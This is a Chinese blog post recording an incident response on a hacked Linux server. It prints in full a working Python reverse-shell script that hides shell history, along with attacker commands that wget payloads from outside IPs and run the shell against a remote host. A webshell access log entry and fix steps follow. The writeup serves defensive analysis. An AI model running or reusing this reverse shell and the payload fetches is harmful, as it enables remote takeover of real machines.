【应急案例】Linux应急记录

最新推荐文章于 2024-08-12 16:03:38 发布
最新推荐文章于 2024-08-12 16:03:38 发布
阅读量623 收藏 1
点赞数 1
分类专栏: 【应急响应】 # Linux应急案例

0x01 背景

本周是在目前公司的最后一周,周五就离职了,在这里待了2年半时间,说短也不短,职业生涯可能也没多少个2年半。出门和同事去撸串的路上收到的告警,急忙赶回来处理,很简单的一次应急,没什么技术含量,因为时间点特殊才想着记录一下,毕竟是最后一次应急响应。

0x02 排查过程

看到告警信息,发现Java进程执行了Wget操作,下载了一个Python文件,访问Python文件,内容如下:

# -*- coding:utf-8 -*-
#!/usr/bin/env python
"""
back connect py version,only linux have pty module
code by google security team
"""
import sys,os,socket,pty
shell = "/bin/sh"
def usage(name):
print 'python reverse connector'
print 'usage: %s <ip_addr> <port>' % name
def main():
if len(sys.argv) !=3:
usage(sys.argv[0])
sys.exit()
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((sys.argv[1],int(sys.argv[2])))
print 'connect ok'
except:
print 'connect faild'
sys.exit()
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
global shell
os.unsetenv("HISTFILE")
os.unsetenv("HISTFILESIZE")
os.unsetenv("HISTSIZE")
os.unsetenv("HISTORY")
os.unsetenv("HISTSAVE")
os.unsetenv("HISTZONE")
os.unsetenv("HISTLOG")
os.unsetenv("HISTCMD")
os.putenv("HISTFILE",'/dev/null')
os.putenv("HISTSIZE",'0')
os.putenv("HISTFILESIZE",'0')
pty.spawn(shell)
s.close()
if __name__ == '__main__':
main()

反弹脚本,确认机器被黑了。
先看下反弹进程:

admin 19363 0.0 0.0 154784 5260 ? S 19:12 0:00 python /tmp/1.py 103.224.248.18 1555

干掉,然后netstat确认下没有对外发起的ESTABLISHED连接。然后看下攻击者执行了什么命令
其中一条机器执行的命令

cat /var/log/audit/audit.log | grep EXECVE | egrep -o "a0=.*" | sed "s/a[0-9]=//g" | sed "s/\"//g" | uniq
whoami
ls -al
ping -c 3 www.baidu.com
bash -i > (bash反弹这个攻击者肯定是没有URL编码&导致没有执行成功)
/bin/bash -i >
wget http://162.247.97.195/223.txt -O 123.jsp
ls -al

另一台执行的命令

cat /var/log/audit/audit.log | grep EXECVE | egrep -o "a0=.*" | sed "s/a[0-9]=//g" | sed "s/\"//g" | uniq
ls -al
wget 43.229.213.219/backs/back.py
ls -al
wget
wget http://43.229.213.219/backs/back.py
pwd
wget http://43.229.213.219/backs/back.py
ls -al
ls -al /root
id
ls -al /tmp
wget http://43.229.213.219/backs/back.py -O /tmp/1.py
ls -al /tmp/1.py
ls -al /var/tmp
ls -al /tmp
python /tmp/1.py 103.224.248.18 1555
pwd
ps -aux
last
ping -c 4 192.168.192.75
ping -c 4 192.168.190.249

对照着Auditd Log

type=EXECVE msg=audit(1532430757.519:892862): argc=3 a0="ls" a1="-al" a2="/tmp"

其中一条日志的时间点是2018/7/24 19:12:37
去搜索Nginx Accesslog

cat /tmp/1 | grep '19:12:37'
66.42.53.201 - - [24/Jul/2018:19:12:37 +0800] "GET /upload/avatar/35364_big.jsp?pwd=023&i=ls%20-al%20/tmp HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0" "-"

这里发现了多个攻击者的IP,包括:

66.42.53.201
27.102.112.62
149.28.148.146
...

Webshell文件为35364_big.jsp,很简单的一个cmd马
然后看到访问目录在/upload/avatar/下也能猜测到,开发没有限制头像处上传文件扩展名白名单导致的。

0x03 处理措施

1)删除Webshell和反弹Python脚本
2)检查两台机器还有没有对外的ESTABLISHED的连接,可能机器仍然被控制
3)让运维修改nginx限制upload目录下的jsp和jspx文件访问
4)让开发修改头像上传处添加服务端扩展名白名单限制,并检查其他上传文件的地方。

FLy_鹏程万里
关注
专栏目录
Linux 应急响应手册v1.0发行版.pdf
05-15
Linux 应急响应手册v1.0发行版.pdf
Linux 应急响应】linux应急响应手册(NOP Team)
qq_47493625的博客
03-25 1372
Linux 应急响应手册是由NOP Team编写的一本Linux 版的应急响应手册。作者自述:在当前的攻防对抗态势中,防守一侧的情况就和木桶效应一样,尤其是在已经被攻破的系统中,排查持久化控制程序如同大海捞针,这本应急响应手册的意义是希望能够有效发现木桶的短板,给予应急响应人员一个较为明确的指导思想,同时给出经过实践测试的操作方法,保证受害系统经过了一次相对全面的排查,以避免由于应急响应人员知识广度和能力水平问题而造成的二次木桶效应。
Linux系统应急响应命令大全
fishfishfishman的博客
08-12 864
在客户单位值守,难免会遇到需要我们排查Linux系统是否存在病毒的情况,网上临时搜的文章指令不是很全,自己笔记本又不太方便复制指令。于是决定总结一下常用指令,发布到博客方便随时使用。
python 反弹shell,加了UDP
weixin_34349320的博客
03-20 241
2019独角兽企业重金招聘Python工程师标准>>> ...
Linux 应急响应命令总结,收藏版
m0_60571990的博客
11-27 1879
Linux 应急响应命令总结,收藏版
应急响应-Linux
sechelper的博客
01-11 675
应急响应指遇到重大或突发事件后所采取的措施和行动。应急响应所处置的突发事件不仅仅包括硬件、产品、网络、配置等方面的故障,也包括各类安全事件,如:黑客攻击、木马病毒、勒索病毒、Web攻击等。
Linux应急响应流程及实战演练
02-03
### Linux应急响应流程及实战演练 #### 一、引言 在现代企业的信息化环境中,Linux作为重要的服务器操作系统之一,承担着关键的应用和服务。然而,随着网络安全威胁的不断升级,Linux服务器面临的风险也在增加。...
Linux 应急响应手册v1.8 发行版.zip
07-24
Linux应急手册》是一本为Linux系统管理员和运维工程师量身打造的...本书内容涵盖了Linux系统安全、性能优化、故障排查等多个方面,通过丰富的实战案例和详细的操作步骤,帮助读者掌握Linux应急响应的核心技能和知识。
HW防守_Linux应急响应基础1
08-03
【HW防守_Linux应急响应基础】是一系列针对Linux系统安全防护和应急响应的文章,旨在提升安全人员在面对HW防守行动时的分析和溯源能力。随着技术的发展,越来越多的厂商重视这种能力,因为它是评估和应对攻击的重要...
一次真实的应急响应案例(Centos)——暴力破解、替换ps命令、留多个后门对应的应急响应靶场
03-10
暴力破解、替换ps命令、留多个houmen-应急响应靶场,应急响应教程:https://blog.csdn.net/weixin_40412037/article/details/123323981?spm=1001.2014.3001.5501
应急排查文档-打码1
08-08
应急排查文档-打码1】是一份详细的安全事件应急响应操作指南,主要涉及软件、插件以及在Linux和Windows操作系统中的应用。该文档旨在帮助IT专业人员在面临安全事件时,快速有效地进行系统排查和恢复。以下是文档的...
linux应急响应基础和常用命令
菜鸟学安全的博客
12-17 2386
linux应急响应基础和常用命令基于linux系统本身进行应急响应。
「干货」Linux 应急响应日志分析命令「详细总结」
橙留香Park的博客
02-25 6444
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ...
Linux应急手册
2301_76786857的博客
02-19 247
当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防 范措施,为企业挽回或减少经济损失。
linux应急响应总结
热门推荐
Shanfenglan's blog
10-14 12万+
前言 分为几个部分来记录一下linux应急响应的一些操作与思路。 主机相关 1.利用自动化检测程序rookithunter进行检测 rookithunter可以自动化检查主机上可能存在的rookit木马文件,与被篡改的命令等,找到被篡改的命令后可以选择删除命令,然后重新安装命令。 参考: 后门和漏洞在Linux中使用“Rootkit Hunter rootkit后门检查工具RKHunter 第一步:下载与安装rookithunter 1.通用操作 wget https://sourceforge.net/p
应急响应思路分享及案例
m0_64583632的博客
04-25 716
应急响应思路分享、面对常见病毒的应急响应
Linux&Windows应急响应+案例分析
2401_84434570的博客
04-19 1349
ls -alt #查找72小时内新增的文件find / -ctime -2 #文件日期、新增文件、可疑/异常文件、最近使用文件、浏览器下载文件/var/run/utmp #有关当前登录用户的信息记录/etc/passwd #用户列表/tmp #临时目录find / *.jsp -perm 4777 #查找777的权限的文件(可以将文件名进行修改phppyhtmlsh等)隐藏文件.xxxx/usr/bin/usr/sbin。
一次真实的应急响应案例(Linux)——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)
W小哥
04-21 4396
一、SSH协议介绍 SSH(Secure Shell)是一套协议标准,可以用来实现两台机器之间的安全登录以及安全的数据传送,其保证数据安全的原理是非对称加密。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议,主要用于给远程登录会话数据进行加密,保证数据传输的安全。 危害: SSH口令长度太短或者复杂度不够,如仅包含数字,或仅包含字母等,容易被攻击者破解,一旦被攻击者获取,可用来直接登录系统,控制服务器所有权限。 一、事件背景 某天客户反馈:Linux服务器有异常链接,疑似被入侵。 ..
linux应急响应案例命令
最新发布
09-11
Linux应急响应通常是指在Linux系统遭受安全威胁或攻击后的快速处理过程,涉及一系列的检测、分析和修复措施。以下是一些在Linux应急响应中可能会用到的命令和步骤: 1. 初步信息收集:首先要确认系统的时间和日期是否准确,以及是否有人未经授权访问系统。 ```bash date last w ``` 2. 检查当前系统进程:查看当前运行的进程,以识别是否有可疑的进程或服务。 ```bash ps aux ``` 3. 查找和分析系统日志:系统日志可能会包含攻击的痕迹或异常行为。 ```bash cat /var/log/syslog cat /var/log/auth.log grep "Failed password" /var/log/auth.log ``` 4. 检查网络连接:查看当前的网络连接状态,尤其是对可疑的远程连接进行分析。 ```bash netstat -tuln lsof -i ``` 5. 检查文件系统异常:查看文件的修改时间、权限等,寻找异常变动。 ```bash find / -type f -ctime -10 stat /etc/passwd ``` 6. 检查开放端口:识别系统上开放的端口,特别是那些不应该开放的端口。 ```bash netstat -tulnp ``` 7. 使用安全工具:可以利用一些现成的安全工具进行系统扫描和分析。 ```bash nmap clamav ``` 8. 备份重要数据:在进行任何可能影响系统状态的操作前,备份重要数据是至关重要的。 ```bash dd if=/dev/sda of=/path/to/backup.img ``` 9. 隔离和修复:一旦发现可疑的文件或进程,立即隔离,并根据情况进行修复或删除。 10. 系统更新和打补丁:确保系统和软件都更新到最新版本,避免已知的漏洞被利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值